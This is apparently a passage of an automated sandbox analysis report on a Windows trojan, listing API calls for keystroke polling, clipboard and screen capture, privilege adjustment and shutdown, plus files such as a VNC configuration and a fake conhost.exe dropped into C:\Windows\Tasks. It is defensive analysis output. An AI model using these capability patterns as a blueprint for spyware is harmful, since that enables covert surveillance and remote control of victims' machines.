                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,23_2_00007FF7E5071AE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5073770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,23_2_00007FF7E5073770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C0650 VkKeyScanA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,GetKeyState,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,GetAsyncKeyState,GetAsyncKeyState,CreateThread,CloseHandle,WinExec,MapVirtualKeyA,23_2_00007FF7E50C0650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF7E50874C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,26_2_00007FF7E50874C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5082E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF7E5082E40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507D560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle,23_2_00007FF7E507D560
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF7E5083550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF7E50834B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5083550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,26_2_00007FF7E5083550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50834B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,26_2_00007FF7E50834B0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\CEpr8q.li7XUgJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\gTFLK1.jBd3EiJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004057210_2_00405721
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004139D10_2_004139D1
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413AAB0_2_00413AAB
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_004133700_2_00413370
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00413D430_2_00413D43
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040AD300_2_0040AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50936D023_2_00007FF7E50936D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A3E2023_2_00007FF7E50A3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509162023_2_00007FF7E5091620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509265023_2_00007FF7E5092650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C065023_2_00007FF7E50C0650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509AE7023_2_00007FF7E509AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A166023_2_00007FF7E50A1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E513068C23_2_00007FF7E513068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5074E8023_2_00007FF7E5074E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508AD3023_2_00007FF7E508AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508859023_2_00007FF7E5088590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5094D7E23_2_00007FF7E5094D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508C5B023_2_00007FF7E508C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096DD123_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071DD023_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5088E1023_2_00007FF7E5088E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508E61023_2_00007FF7E508E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509A87023_2_00007FF7E509A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508A89023_2_00007FF7E508A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508C09023_2_00007FF7E508C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507188023_2_00007FF7E5071880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50870B023_2_00007FF7E50870B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508C8D023_2_00007FF7E508C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50820E023_2_00007FF7E50820E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507A91023_2_00007FF7E507A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508110023_2_00007FF7E5081100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508974023_2_00007FF7E5089740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512DF8023_2_00007FF7E512DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507377023_2_00007FF7E5073770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508AF6023_2_00007FF7E508AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509E78023_2_00007FF7E509E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507C81023_2_00007FF7E507C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5095A3323_2_00007FF7E5095A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077A1C23_2_00007FF7E5077A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512725023_2_00007FF7E5127250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509623E23_2_00007FF7E509623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5098A7023_2_00007FF7E5098A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508027023_2_00007FF7E5080270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507227023_2_00007FF7E5072270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077A5B23_2_00007FF7E5077A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5073A9023_2_00007FF7E5073A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077A9A23_2_00007FF7E5077A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077ACF23_2_00007FF7E5077ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509C2C023_2_00007FF7E509C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50E12C023_2_00007FF7E50E12C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509AB1023_2_00007FF7E509AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077B0423_2_00007FF7E5077B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508A13023_2_00007FF7E508A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508693023_2_00007FF7E5086930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509D15023_2_00007FF7E509D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507517023_2_00007FF7E5075170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509F98023_2_00007FF7E509F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508898023_2_00007FF7E5088980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50781AD23_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507E1D023_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50951B723_2_00007FF7E50951B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50779E923_2_00007FF7E50779E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E51309F023_2_00007FF7E51309F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507420023_2_00007FF7E5074200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509A42023_2_00007FF7E509A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A346023_2_00007FF7E50A3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5138C9023_2_00007FF7E5138C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5132C7023_2_00007FF7E5132C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A54A023_2_00007FF7E50A54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A5CA023_2_00007FF7E50A5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5092CC023_2_00007FF7E5092CC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509DCF023_2_00007FF7E509DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507DCF023_2_00007FF7E507DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A1CE023_2_00007FF7E50A1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5081D1023_2_00007FF7E5081D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A033023_2_00007FF7E50A0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077B3723_2_00007FF7E5077B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077B7123_2_00007FF7E5077B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5087B9023_2_00007FF7E5087B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507439023_2_00007FF7E5074390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508BB8023_2_00007FF7E508BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077BA623_2_00007FF7E5077BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509739B23_2_00007FF7E509739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508B3D023_2_00007FF7E508B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096BBD23_2_00007FF7E5096BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512E40023_2_00007FF7E512E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50893E023_2_00007FF7E50893E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5077BE223_2_00007FF7E5077BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5084C1023_2_00007FF7E5084C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A3E2026_2_00007FF7E50A3E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509162026_2_00007FF7E5091620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509265026_2_00007FF7E5092650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C065026_2_00007FF7E50C0650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509AE7026_2_00007FF7E509AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A166026_2_00007FF7E50A1660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E513068C26_2_00007FF7E513068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5074E8026_2_00007FF7E5074E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50936D026_2_00007FF7E50936D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508AD3026_2_00007FF7E508AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508859026_2_00007FF7E5088590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5094D7E26_2_00007FF7E5094D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508C5B026_2_00007FF7E508C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5096DD126_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5071DD026_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5092DF326_2_00007FF7E5092DF3
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5088E1026_2_00007FF7E5088E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508E61026_2_00007FF7E508E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509A87026_2_00007FF7E509A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508A89026_2_00007FF7E508A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508C09026_2_00007FF7E508C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507188026_2_00007FF7E5071880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50870B026_2_00007FF7E50870B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508C8D026_2_00007FF7E508C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50820E026_2_00007FF7E50820E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507A91026_2_00007FF7E507A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508110026_2_00007FF7E5081100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508974026_2_00007FF7E5089740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E512DF8026_2_00007FF7E512DF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507377026_2_00007FF7E5073770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508AF6026_2_00007FF7E508AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509E78026_2_00007FF7E509E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507C81026_2_00007FF7E507C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5095A3326_2_00007FF7E5095A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077A1C26_2_00007FF7E5077A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E512725026_2_00007FF7E5127250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509623E26_2_00007FF7E509623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5098A7026_2_00007FF7E5098A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508027026_2_00007FF7E5080270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507227026_2_00007FF7E5072270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077A5B26_2_00007FF7E5077A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5073A9026_2_00007FF7E5073A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077A9A26_2_00007FF7E5077A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077ACF26_2_00007FF7E5077ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509C2C026_2_00007FF7E509C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50E12C026_2_00007FF7E50E12C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509AB1026_2_00007FF7E509AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077B0426_2_00007FF7E5077B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508A13026_2_00007FF7E508A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508693026_2_00007FF7E5086930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509D15026_2_00007FF7E509D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507517026_2_00007FF7E5075170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509F98026_2_00007FF7E509F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508898026_2_00007FF7E5088980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50781AD26_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507E1D026_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50951B726_2_00007FF7E50951B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50779E926_2_00007FF7E50779E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E51309F026_2_00007FF7E51309F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507420026_2_00007FF7E5074200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509A42026_2_00007FF7E509A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A346026_2_00007FF7E50A3460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5138C9026_2_00007FF7E5138C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5132C7026_2_00007FF7E5132C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A54A026_2_00007FF7E50A54A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A5CA026_2_00007FF7E50A5CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509DCF026_2_00007FF7E509DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507DCF026_2_00007FF7E507DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A1CE026_2_00007FF7E50A1CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5081D1026_2_00007FF7E5081D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A033026_2_00007FF7E50A0330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077B3726_2_00007FF7E5077B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077B7126_2_00007FF7E5077B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5087B9026_2_00007FF7E5087B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507439026_2_00007FF7E5074390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508BB8026_2_00007FF7E508BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077BA626_2_00007FF7E5077BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509739B26_2_00007FF7E509739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508B3D026_2_00007FF7E508B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5096BBD26_2_00007FF7E5096BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E512E40026_2_00007FF7E512E400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50893E026_2_00007FF7E50893E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5077BE226_2_00007FF7E5077BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5084C1026_2_00007FF7E5084C10
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: String function: 004026B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E50DA3B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E51270B4 appears 56 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E5073730 appears 730 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E5129500 appears 42 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E5127C50 appears 60 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7E507AE30 appears 34 times
                          Source: GIjul8.QTIrrr.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: GIjul8.QTIrrr.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000000.1292984948.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000002.3170830566.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exe, 00000000.00000002.3170830566.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exeBinary or memory string: OriginalFilenamebrowser.exe( vs Olz7TmvkEW.exe
                          Source: Olz7TmvkEW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: conhost.exe.6.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                          Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@56/60@4/1
